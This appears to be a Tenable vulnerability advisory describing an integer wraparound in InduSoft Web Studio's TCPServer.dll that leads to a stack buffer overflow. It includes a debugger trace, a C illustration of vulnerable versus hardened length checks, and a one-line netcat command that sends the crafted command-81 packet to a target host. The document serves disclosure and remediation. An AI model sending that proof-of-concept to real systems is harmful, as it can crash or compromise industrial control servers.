Synopsis
Tenable found a stack buffer overflow vulnerability in TCPServer.dll while developing a Nessus plugin for CVE-2018-8840. To understand the vulnerability, a description of the WSTR structure in TCPServer.dll is useful. The WSTR class is used to store wide-character strings:
class WSTR
{
    vftable;
    unsigned short lbuf[0x40];  // local storage for the string data
    void *pData;                // ptr to string data; can point to @lbuf
    int32 DataLen;              // length allocated for @pData
    ...
};
Strings shorter than 0x40 bytes are stored in the lbuf array. Otherwise, heap memory is allocated and pData and DataLen are updated accordingly.
When processing command 81, TCPServer.dll tries to read a string into a WSTR object. To determine whether the string should be stored in lbuf or in a heap-allocated buffer, TCPServer.dll first reads the string length. The user-provided length is incremented by one to account for a null terminator and compared against 0x40. If the length + 1 is less than 0x40, the string is stored in lbuf. A remote unauthenticated attacker can abuse this by providing a length of 0xffffffff. When one is added, the length rolls over to zero, which causes TCPServer.dll to try to store the string in lbuf. The server then attempts to copy 0xffffffff bytes into lbuf, resulting in the following stack buffer overflow:
STATUS_STACK_BUFFER_OVERRUN encountered
(9e8.b28): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
kernel32!UnhandledExceptionFilter+0x5f:
766ce331 cc              int     3
0:020> kb
 # ChildEBP RetAddr  Args to Child
00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL -
01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
WARNING: Stack unwind information not available. Following frames may be wrong.
02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
[...]
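The integer wraparound behind the length check is easier to see in code. The following C is an added illustration written for this advisory, not TCPServer.dll's actual code: `wstr_t`, the function names, and the assumption that lbuf holds 0x40 wide characters are all reconstructed from the WSTR description above. `fits_in_lbuf_vulnerable` reproduces the described check (`len + 1 < 0x40`), `fits_in_lbuf_hardened` rejects the wrapping length, and `wstr_read_checked` shows a bounded version of the read that also refuses a claimed length larger than the payload actually received.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LBUF_CHARS 0x40u  /* inline buffer size taken from the WSTR layout above */

/* Minimal stand-in for the WSTR object (assumed layout, vftable omitted). */
typedef struct {
    uint16_t  lbuf[LBUF_CHARS];  /* inline storage for short strings */
    uint16_t *pData;             /* points at lbuf or at a heap buffer */
    uint32_t  dataLen;           /* capacity of pData, in wide characters */
} wstr_t;

/* Storage decision as the advisory describes it: add one for the terminator,
 * then compare against 0x40. With len == 0xffffffff the addition wraps to 0,
 * so the check passes and a huge copy is routed into the 64-element lbuf. */
bool fits_in_lbuf_vulnerable(uint32_t len) {
    uint32_t needed = len + 1;      /* unsigned wraparound: 0xffffffff + 1 == 0 */
    return needed < LBUF_CHARS;
}

/* Hardened decision: refuse any length whose increment would wrap. */
bool fits_in_lbuf_hardened(uint32_t len) {
    if (len == UINT32_MAX) return false;   /* len + 1 would wrap to 0 */
    return len + 1 < LBUF_CHARS;
}

/* Bounded read of a command-81 style string: len is the client-claimed
 * character count, avail is how many wide characters are really present in
 * the received message. Returns 0 on success, -1 if the length is rejected. */
int wstr_read_checked(wstr_t *s, uint32_t len, const uint16_t *src, size_t avail) {
    if (len == UINT32_MAX) return -1;            /* would wrap on +1 */
    if ((size_t)len > avail) return -1;          /* claimed length exceeds payload */
    uint32_t needed = len + 1;                   /* room for the terminator */
    if (needed < LBUF_CHARS) {
        s->pData   = s->lbuf;
        s->dataLen = LBUF_CHARS;
    } else {
        s->pData = malloc((size_t)needed * sizeof(uint16_t));
        if (s->pData == NULL) return -1;
        s->dataLen = needed;
    }
    memcpy(s->pData, src, (size_t)len * sizeof(uint16_t));
    s->pData[len] = 0;                           /* null terminator */
    return 0;
}

/* Release heap storage if the string did not fit inline. */
void wstr_release(wstr_t *s) {
    if (s->pData != NULL && s->pData != s->lbuf) free(s->pData);
    s->pData = NULL;
    s->dataLen = 0;
}

/* True when the string ended up in the inline buffer. */
bool wstr_is_inline(const wstr_t *s) { return s->pData == s->lbuf; }

int main(void) {
    /* Constructed sample payload: three wide chars "ABC". */
    const uint16_t sample[] = { 0x41, 0x42, 0x43 };
    wstr_t s = {0};

    printf("vulnerable check, len=0xffffffff -> %s\n",
           fits_in_lbuf_vulnerable(0xffffffffu) ? "fits lbuf (wrong)" : "rejected");
    printf("hardened   check, len=0xffffffff -> %s\n",
           fits_in_lbuf_hardened(0xffffffffu) ? "fits lbuf" : "rejected (correct)");

    /* A claimed length of 0xffffffff with only 3 chars on the wire is refused. */
    printf("checked read, bogus length:  %d\n",
           wstr_read_checked(&s, 0xffffffffu, sample, 3));
    /* An honest length is accepted and lands in lbuf. */
    printf("checked read, honest length: %d, inline=%d\n",
           wstr_read_checked(&s, 3, sample, 3), (int)wstr_is_inline(&s));
    wstr_release(&s);
    return 0;
}
```

The two checks differ only in handling the wrap: comparing `len + 1` after the addition is what lets 0xffffffff through, so the hardened form tests the wrap before adding (or, equivalently, compares `len` against `0x40 - 1` without the addition) and additionally bounds the copy by the bytes actually received.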
The following commands will recreate the issue:
cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234
Solution
AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability.
Additional References
https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec128(002).pdf?t=1531912618199
https://ics-cert.us-cert.gov/advisories/ICSA-18-200-01
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]